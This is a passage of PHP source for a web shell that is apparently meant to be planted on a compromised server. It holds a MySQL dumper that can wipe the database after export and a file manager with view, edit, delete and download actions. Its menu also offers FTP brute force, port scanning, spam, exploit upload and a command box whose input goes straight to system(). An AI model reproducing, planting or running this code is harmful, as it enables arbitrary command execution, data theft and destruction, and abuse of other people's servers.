if ($sqlaction=='save') { if ($secu==1) { $fp=fopen($secu_config,"w"); fputs($fp,"<?php\n"); fputs($fp,"\$dbhost='$dbhost';\n"); fputs($fp,"\$dbbase='$dbbase';\n"); fputs($fp,"\$dbuser='$dbuser';\n"); fputs($fp,"\$dbpass='$dbpass';\n"); fputs($fp,"?>"); fclose($fp); } if (!is_array($tbls)) { echo $header."<meta http-equiv=\"Content-Type\" content=\"text/html; charset= windows-1251\"> <br><center><font color=red>You forgot to check tables, which you need to dump = )</b></font></center>\n$footer"; exit; } if($f_cut==1) { if (!is_numeric($fz_max)) { echo $header."<br><center><font color=red><b>Veuillez choisir une valeur numr ique la taille du fichier scinder.</b></font></center>\n$footer"; exit;

} if ($fz_max < 200000) { echo $header."<br><center><font color=red><b>Veuillez choisir une taille de fichier a scinder sup rieure 200 000 Octets.</b></font></center>\n$footer"; exit; } }

$tbl=array(); $tbl[]=reset($tbls); if (count($tbls) > 1) { $a=true; while ($a !=false) { $a=next($tbls); if ($a !=false) { $tbl[]=$a; } } }

if ($opt==1) { $sv_s=true; $sv_d=true; } else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; } else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; } else { exit; }

$fext=".".$savmode; $fich=$dbbase.$fc.$fext; $dte=""; if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz=""; if ($file_type=='1') { $gz.=".gz"; } $fcut=false; $ftbl=false;

$f_nm=array(); if($f_cut==1) { $fcut=true;$fz_max=$fz_max;$nbf=1;$f_size=170;} if($f_tbl==1) { $ftbl=true; } else { if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); } else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); } }

$nbf=1; mysql_connect($dbhost,$dbuser,$dbpass); mysql_select_db($dbbase); if ($fext==".sql") { if ($ftbl) { while (list($i)=each($tbl)) { $temp=sqldumptable($tbl[$i]); $sz_t=strlen($temp); if ($fcut) { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz); $nbf=0; $p_sql=split_sql_file($temp); while(list($j,$val)=each($p_sql)) { if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); } else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf .".sql".$gz); write_file($val.";"); } } close_file(); } else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n \n");close_file();$nbf=1; } $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>"; }

} else { $tblsv=""; while (list($i)=each($tbl)) { $temp=sqldumptable($tbl[$i]); $sz_t=strlen($temp); if ($fcut && ((file_pos()+$sz_t) > $fz_max)) { $p_sql=split_sql_file($temp); while(list($j,$val)=each($p_sql)) { if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); } else { close_file(); $nbf++; open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz); write_file($val.";"); } } } else { write_file($temp); } $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>"; } } } else if ($fext==".csv") { if ($ftbl) { while (list($i)=each($tbl)) { $temp=csvdumptable($tbl[$i]); $sz_t=strlen($temp); if ($fcut) { open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz); $nbf=0; $p_csv=split_csv_file($temp);

while(list($j,$val)=each($p_csv)) { if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); } else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz); write_file($val."\n"); } } close_file(); } else { open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz); write_file($temp."\n\n"); close_file(); $nbf=1; } $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>"; } } else { while (list($i)=each($tbl)) { $temp=csvdumptable($tbl[$i]); $sz_t=strlen($temp); if ($fcut && ((file_pos()+$sz_t) > $fz_max)) { $p_csv=split_sql_file($temp); while(list($j,$val)=each($p_csv)) { if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); } else { close_file(); $nbf++; open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);

write_file($val."\n"); } } } else { write_file($temp); } $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>"; } } }

mysql_close(); if (!$ftbl) { close_file(); }

echo $header; echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted to this file:<br><br></center><table border='0' align='center' cellpadding='0' cell spacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcol or='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr>< td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' alig n=center class=texte><font size=1><b>File</b></font></td><td></td><td bgcolor='# 338CBD' align=center class=texte><font size=1><b>Size</b></font></td><td></td></ tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>"; reset($f_nm); while (list($i,$val)=each($f_nm)) { $coul='#99CCCC'; if ($i % 2) { $coul='#CFE3E3'; } echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>"; $fz_tmp=filesize($val); if ($fcut && ($fz_tmp > $fz_max)) { echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_t mp." Octets</font>&nbsp;</td><td></td></tr>"; } else { echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." bites </font>&nbsp;</td><td></td></tr>"; }

echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>"; } echo "</table><br>"; echo $footer;exit; }

if ($sqlaction=='connect') { if(!@mysql_connect($dbhost,$dbuser,$dbpass)) { echo $header."<br><center><font color=red><b>Unable to connect! Check your da ta input!</b></font></center>\n$footer"; exit; }

if(!@mysql_select_db($dbbase)) { echo $header."<br><center><font color=red><<b>Unable to connect! Check your d ata input!</b></font></center>\n$footer"; exit; }

if ($secu==1) { if (!file_exists($secu_config)) { $fp=fopen($secu_config,"w"); fputs($fp,"<?php\n"); fputs($fp,"\$dbhost='$dbhost';\n"); fputs($fp,"\$dbbase='$dbbase';\n"); fputs($fp,"\$dbuser='$dbuser';\n"); fputs($fp,"\$dbpass='$dbpass';\n"); fputs($fp,"?>"); fclose($fp); } include($secu_config);

} else { if (file_exists($secu_config)) { unlink($secu_config); } }

mysql_connect($dbhost,$dbuser,$dbpass); $tables=mysql_list_tables($dbbase); $nb_tbl=mysql_num_rows($tables);

echo $header."<script language='javascript'> function checkall() { var i=0;whi le (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1 ;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';docum ent.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Choose tab les you need to dump!</b><form action='' method='post' name=formu><input type='h idden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$ dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass' ><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpaddi ng='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col w idth=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td>< /td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Check all' onc lick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\" ></td><td></td><td bgcolor='#338CBD' align=center><B>Table names</b></td><td></t d></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";

$i=0; while ($i < mysql_num_rows ($tables)) { $coul='#99CCCC'; if ($i % 2) { $coul='#CFE3E3';} $tb_nom=mysql_tablename ($tables,$i); echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[ ".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;& nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr >"; $i++; }

mysql_close(); echo "</table><br><br><table align=center border=0><tr><td align=left class=te

xte> <hr> <input type='radio' name='savmode' value='csv'> Save to csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked> Save to Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' c hecked> Save structure and data<br> <input type='radio' name='opt' value='2'> Save structure only<br> <input type='radio' name='opt' value='3'> Save data only<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checke d> Rewrite file if exists<br> <input type='Checkbox' name='ecraz' value='1' chec ked> Clear database after dump<br> <input type='Checkbox' name='f_tbl' value='1'> Put each table to a separate file<br> <input type='Checkbox' name='f_cut' valu e='1'> Maximum dump-file size: <input type='text' name='fz_max' value='200000' class= form> Octets<br> <input type='Checkbox' name='file_type' value='1'> Gzip.<br> </td></tr></table><br><br><input type='submit' value=' Dump:) ' class=form></f orm></center>$footer"; exit; }

// SQL actions END

if(file_exists($secu_config)) { include ($secu_config); $ck="checked"; } else { $dbhost="localhost"; $dbbase=""; $dbuser="root"; $dbpass=""; $ck="";

echo $header." <center><br><br> <table width=620 cellpadding=0 cellspacing=0 align=center> <col width=1> <col width=600> <col width=1> <tr> <td></td> <td align=left class=texte> <br> <form action='' method='post'> <input type='hidden' name='sqlaction' value='connect'> <table border=0 align=center> <col> <col align=left> <tr> <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Enter data to connect to MySQL server!<br><br></td> </tr> <tr> <td class=texte>Server address:</td> <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form ></td> </tr> <tr> <td class=texte>Base name:</td> <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td> </tr> <tr>

<td class=texte>Login:</td> <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td > </tr> <tr> <td class=texte>Password</td> <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td > </tr> </table> <br> <center> <br><br> <input type='submit' value=' Connect ' class=form></center> </form> <br><br> </td> <td></td> </tr> <tr> <td height=1 colspan=3></td> </tr> </table> </center>";

} // SQL END

/* main() */ set_time_limit(0);

if ( $action !="download") print("$HTML");

if (!isset($cm)) { if (!isset($action)) {

if (!isset($tm)) { $tm = getcwd(); } $curdir = getcwd(); if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bord ercolordark=white><tr><td align=center class=alert>Access to directory is denied , see CHMOD.</td></tr></table>"); getdir(); chdir($curdir); $supsub = $gdir[$j-1]; if (!isset($tm) ) { $tm=getcwd();} readdirdata($tm); } else { switch ($action) { case "view": viewfile($tm,$fi); break; case "delete": echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width= 300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=whit e><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fi</b> w as deleted successfully.</font></center></td></tr></table>"; deletef($tm); break; case "download": if (isset($fatt) && strlen($fatt)>0) { $attach=$fatt; header("Content-type: text/plain"); } else { $attach=$fi; header("Content-type: hackru"); } header("Content-disposition: attachment; filename=\"$attach\";");

readfile($tm."/".$fi); break; case "download_mail": download_mail($tm,$fi); break; case "edit": editfile($tm,$fi); break; case "save": savefile($tm,$fi); break; case "uploadd": uploadtem(); break; case "up": up($tm); break; case "newdir": newdir($tm); break; case "createdir": cdir($tm); break; case "deldir": deldir(); break; case "feedback": mailsystem(); break; case "upload":

upload(); break; case "help": help(); break; case "ftp": ftp(); break; case "portscan": portscan(); break; case "sql": sql(); break; case "tar": tar(); break; case "bash": bash(); break; case "passwd": passwd(); break; case "exploits": exploits($dir); break; case "upload_exploits": upload_exploits($dir); break; case "upload_exploitsp":

upload_exploitsp($dir); break; case "arhiv": arhiv($tm,$pass); break; case "crypte": crypte(); break; case "decrypte": decrypte(); break; case "brut_ftp": brut_ftp(); break; case "copyfile": copyfile($tm,$fi); break; case "down": down($dir); break; case "downfiles": downfiles($dir); break; case "spam": spam(); break; } } } else { echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600

align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>< tr><td><center>Done: $cm</center><pre>"; echo system($cm); echo "</pre></td></tr></table>"; }

if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv " && $action != "download_mail2" && $action != "feedback" && $action != "uploadd " && $action != "newdir" && $action != "edit" && $action != "view" && $action ! = "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $ac tion != "tar" && $action != "bash" && $action != "anonimmail") { echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER =1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white ><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=page title><b>Command prompy (like bash):</b></td></tr><tr><td valign=top><input type =text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit va lue='GO' class=button1 $style_button></td></tr></form></table>"; $perdir = @permissions(fileperms($tm)); if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem(); else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=30 0 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle><b>Unable to upload files to current direct ory</b></font></td></tr></table>"; if ($perdir[7] == "w" && isset($tm)) { echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><f orm method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=c enter colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign =top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top>< input type=submit value='GO' class=button1 $style_button></td></tr></form></tabl e>"; } else { echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 al ign=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr> <td align=center class=pagetitle><b>Unable to create directory here</b></td></tr ></table>"; } }

if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action !=

"crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv " && $action != "download_mail2" && $action != "feedback" && $action != "uploadd " && $action != "newdir" && $action != "edit" && $action != "view" && $action ! = "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonim mail") { echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 a lign=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><fo rm method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitl e><b>Ready usefull requests to unix server:</b></td></tr><tr><td valign=top widt h=95%><select name=cm class='inputbox'>"; foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inpu tbox'>$alias_name</option>"; echo "</select></td><td valign=top align=right width=5%><input type=submit valu e='GO' class=button1 $style_button></td></tr></table></form>"; }

if ( $action !="download") echo nfm_copyright(); ?>

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